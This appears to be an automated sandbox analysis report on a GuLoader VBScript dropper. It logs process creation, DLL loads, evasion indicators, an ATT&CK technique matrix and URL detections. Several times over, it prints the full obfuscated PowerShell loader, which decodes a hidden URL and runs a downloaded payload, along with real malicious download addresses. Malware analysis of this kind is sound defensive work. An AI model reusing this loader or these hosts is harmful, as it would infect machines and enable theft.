DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: ystem.pdbM source: powershell.exe, 00000001.00000002.3005157693.00000273D325E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.3005157693.00000273D31D4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.3005157693.00000273D31D4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000001.00000002.3005157693.00000273D31F4000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("POWERSHELL "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 N", "0")
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B7600AD pushad ; iretd 1_2_00007FFD9B7600C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B835479 push ebp; iretd 1_2_00007FFD9B835538
      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5100
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4797
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2412 | Thread sleep time: -1844674407370954s >= -30000s
      Source: powershell.exe, 00000001.00000002.3005157693.00000273D31F4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWY
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara match | File source: amsi64_7016.amsi.csv, type: OTHER
      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7016, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter';if (${host}.currentculture) {$bellisserne++;}function gaardspladsens($agerendes){$dafter135=$agerendes.length-$bellisserne;$unburden='substri';$unburden+='ng';for( $unminimizing=5;$unminimizing -lt $dafter135;$unminimizing+=6){$anetholes+=$agerendes.$unburden.invoke( $unminimizing, $bellisserne);}$anetholes;}function sanktionjtr($epigyne){ . ($emanciperingerne) ($epigyne);}$forlngelsers=gaardspladsens 'ol ermtyvekodi.elzcoenoi fronl heldl.nfusanatro/e.cam5unbri.avlsh0koord fo.b(po.omw acceifravrnamentd unpuorealkw zoonsmyxom .ejsn .hudtrecor unend1turne0,npow.zymoc0dacty;predo f,skewantipiseptingu,gn6kundg4brn,b;colla overixforsy6af ta4 malt;fo.ew lawserprepov kom,:barnl1for e2incom1tom,t.te,eo0alloc)b.ytk vill,g skyte retrc kldnk maveochili/l.tre2redis0nazil1tling0c rci0zitta1trkas0nonco1 slu selecfm.ssaiskyd rsi ine ampf .ostochevixdemob/trodd1und.r2ser m1earmu.stra,0exagg ';$fangstknivens=gaardspladsens 'imparupremosaromaeballar unfr-lect,apliengripo,e excenrubritdefin ';$unyttigst=gaardspladsens 'afvrgh danstallesth.stepkommesbevi,: k.nt/dosme/ forgwiter.wpal mwneur..houslavagarlc ccymklovnr hemawannelaskjerd.ndta. 
svrvcunkinosultampimps/,tammwparanh skva/sp.cksunin,ulo hiborgieostorkrsamtadoptrnitap.lnresunecommerpaxone,hapengowlkdpingeerokkes,usti7affld8unem..,eadmsunharmde eniv,nre>microhforlotsteretkniplpkonklstillg:lingu/rengr/ dimyw susiwbreg.w,onst. samle domsrggepupargui-appelrn,rmaoopryky ethea akkrlgarvk-protoc kandrno.atofe tswfejlmnmesop. decaiembaln irkefresteoanh l/ cifrwchanchattak/,adios alaru.ountbindlsoparaprpian.d scrai thorns.ptiefin.irk ntaechantnvegetd fingei,glosguden7 bekr8abrik.,ydroskri sm lddeim.tte ';$deaktiverende=gaardspladsens 'panor> atol ';$emanciperingerne=gaardspladsens 'bru.hiblideerut,exfyl e ';$almengjordes='loftrum243';$cometlike = gaardspladsens ' h lvequ,drcrespohsura,osniff teser%subcha klunpkun.tptaagedflotaacr.sst tvanacox c%d.mss\auruns nforuskrmscsv jncaiz,eegreensanthof fjerudisjolveksedlitogeblod.. sub,bcentrlteksto olle lati&ultra&tamar sandieophthct ndah c.gaoafplu familtslidb ';sanktionjtr (gaardspladsens 'isos.$impregarri.ltombaorossabgast aso,thlprede:.eseruhanged disksautoomsbeopekontolwretctincrenberigimenzino,eirgded gepurifn ho o=w ter( gam,creto.m excadeloin unch/ ami callit rekvi$obolec stavosuppemsevereunmantthromloghamices,ok rekoe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter';if (${host}.currentculture) {$bellisserne++;}function gaardspladsens($agerendes){$dafter135=$agerendes.length-$bellisserne;$unburden='substri';$unburden+='ng';for( $unminimizing=5;$unminimizing -lt $dafter135;$unminimizing+=6){$anetholes+=$agerendes.$unburden.invoke( $unminimizing, $bellisserne);}$anetholes;}function sanktionjtr($epigyne){ . ($emanciperingerne) ($epigyne);}$forlngelsers=gaardspladsens 'ol ermtyvekodi.elzcoenoi fronl heldl.nfusanatro/e.cam5unbri.avlsh0koord fo.b(po.omw acceifravrnamentd unpuorealkw zoonsmyxom .ejsn .hudtrecor unend1turne0,npow.zymoc0dacty;predo f,skewantipiseptingu,gn6kundg4brn,b;colla overixforsy6af ta4 malt;fo.ew lawserprepov kom,:barnl1for e2incom1tom,t.te,eo0alloc)b.ytk vill,g skyte retrc kldnk maveochili/l.tre2redis0nazil1tling0c rci0zitta1trkas0nonco1 slu selecfm.ssaiskyd rsi ine ampf .ostochevixdemob/trodd1und.r2ser m1earmu.stra,0exagg ';$fangstknivens=gaardspladsens 'imparupremosaromaeballar unfr-lect,apliengripo,e excenrubritdefin ';$unyttigst=gaardspladsens 'afvrgh danstallesth.stepkommesbevi,: k.nt/dosme/ forgwiter.wpal mwneur..houslavagarlc ccymklovnr hemawannelaskjerd.ndta. 
svrvcunkinosultampimps/,tammwparanh skva/sp.cksunin,ulo hiborgieostorkrsamtadoptrnitap.lnresunecommerpaxone,hapengowlkdpingeerokkes,usti7affld8unem..,eadmsunharmde eniv,nre>microhforlotsteretkniplpkonklstillg:lingu/rengr/ dimyw susiwbreg.w,onst. samle domsrggepupargui-appelrn,rmaoopryky ethea akkrlgarvk-protoc kandrno.atofe tswfejlmnmesop. decaiembaln irkefresteoanh l/ cifrwchanchattak/,adios alaru.ountbindlsoparaprpian.d scrai thorns.ptiefin.irk ntaechantnvegetd fingei,glosguden7 bekr8abrik.,ydroskri sm lddeim.tte ';$deaktiverende=gaardspladsens 'panor> atol ';$emanciperingerne=gaardspladsens 'bru.hiblideerut,exfyl e ';$almengjordes='loftrum243';$cometlike = gaardspladsens ' h lvequ,drcrespohsura,osniff teser%subcha klunpkun.tptaagedflotaacr.sst tvanacox c%d.mss\auruns nforuskrmscsv jncaiz,eegreensanthof fjerudisjolveksedlitogeblod.. sub,bcentrlteksto olle lati&ultra&tamar sandieophthct ndah c.gaoafplu familtslidb ';sanktionjtr (gaardspladsens 'isos.$impregarri.ltombaorossabgast aso,thlprede:.eseruhanged disksautoomsbeopekontolwretctincrenberigimenzino,eirgded gepurifn ho o=w ter( gam,creto.m excadeloin unch/ ami callit rekvi$obolec stavosuppemsevereunmantthromloghamices,ok rekoeJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
      Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      ATT&CK matrix (techniques per tactic; a number in parentheses is the count badge the report shows beside that technique)
      Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
      Resource Development: Scripting (221), Domains, DNS Server, Virtual Private Server, Server, Botnet
      Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
      Execution: Command and Scripting Interpreter (12), Exploitation for Client Execution (1), PowerShell (2), Cron, Launchd, Scheduled Task
      Persistence: Scripting (221), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
      Privilege Escalation: Process Injection (11), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
      Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (21), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), DLL Side-Loading (1)
      Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
      Discovery: Security Software Discovery (1), Process Discovery (1), Virtualization/Sandbox Evasion (21), Application Window Discovery (1), File and Directory Discovery (1), System Information Discovery (12)
      Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
      Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
      Command and Control: Encrypted Channel (11), Ingress Tool Transfer (3), Non-Application Layer Protocol (3), Application Layer Protocol (14), Fallback Channels, Multiband Communication
      Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
      Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop
      Source | Detection | Scanner | Label
      mg.vbs | 34% | ReversingLabs | Script-WScript.Trojan.GuLoader
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      Source | Detection | Scanner | Label
      https://www.almrwad.com | 0% | Avira URL Cloud | safe
      http://www.almrwad.com | 0% | Avira URL Cloud | safe
      http://almrwad.com | 0% | Avira URL Cloud | safe
      http://www.erp-royal-crown.info | 100% | Avira URL Cloud | phishing
      https://www.erp-royal-crown.info/wh/Subordinerendes78.smiX | 100% | Avira URL Cloud | phishing
      https://www.erp-royal-crown.info | 100% | Avira URL Cloud | phishing
      http://erp-royal-crown.info | 100% | Avira URL Cloud | phishing
      https://www.erp-royal-crown.info/wh/Subordinerendes78.smi | 100% | Avira URL Cloud | malware
      https://www.almrwad.com/wh/Subordinerendes78.smi | 100% | Avira URL Cloud | malware
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      erp-royal-crown.info | 148.251.114.233 | true | false | - | unknown
      almrwad.com | 184.171.244.231 | true | false | - | unknown
      www.almrwad.com | unknown | unknown | false | - | unknown
      www.erp-royal-crown.info | unknown | unknown | false | - | unknown
      Name | Malicious | Antivirus Detection | Reputation
      https://www.erp-royal-crown.info/wh/Subordinerendes78.smi | false | Avira URL Cloud: malware | unknown
      https://www.almrwad.com/wh/Subordinerendes78.smi | false | Avira URL Cloud: malware | unknown
      Name | Source | Malicious | Antivirus Detection | Reputation
      http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.3000440542.00000273CAE31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3000440542.00000273CACEF000.00000004.00000800.00020000.00000000.sdmp | false | - | high
      http://almrwad.com | powershell.exe, 00000001.00000002.2980240959.00000273BC4A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC3D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC668000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB7A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBE9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BCAA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB5AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BB1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BC06D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2980240959.00000273BBD2B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
